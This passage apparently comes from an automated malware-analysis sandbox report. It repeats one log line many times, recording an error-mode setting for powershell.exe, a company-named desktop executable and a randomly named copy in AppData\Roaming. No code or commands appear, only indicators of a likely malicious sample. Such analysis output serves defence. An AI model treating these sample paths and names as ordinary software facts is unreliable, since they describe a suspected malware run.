Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
